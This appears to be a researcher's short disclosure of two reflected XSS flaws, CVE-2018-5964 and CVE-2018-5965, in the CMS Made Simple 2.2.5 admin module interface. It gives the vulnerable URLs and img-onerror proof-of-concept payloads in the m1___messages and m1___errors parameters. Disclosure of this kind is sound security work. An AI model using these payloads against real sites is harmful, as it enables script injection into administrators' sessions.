CVE-2018-5964, CVE-2018-5965
CVE-2018-5964
CMS Made Simple (CMSMS) 2.2.5 has Reflected XSS in
/admin/moduleinterface.php?
mact=ModuleManager,m1_,defaultadmin,0&_sk_=d07f6f6eb9b1a92a741&m1___activetab
=installed&m1___messages=CMSMailer%20module%20has%20been%20successfully%20i
via the m1__messages parameter.
After some installing or uninstalling modules, this will show After blah blah with parameter m1_message. Use this m1_message parameter value as ‘>”><img src=x onerror=alert(document.domain)> and then lead to XSS.

CVE-2018-5965
Another possible parameter that can possible to execute javascript is ….
GET /cmsms-2.2.5-install/admin/moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=ba5e56a6aa91ad93f43&m1___activetab=templates&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
I read lots of paper and website about this CMS. They don’t give bounty for using admin role. So i repot to mitre and got this CVE-2018-5964,CVE-2018-5965.
ref: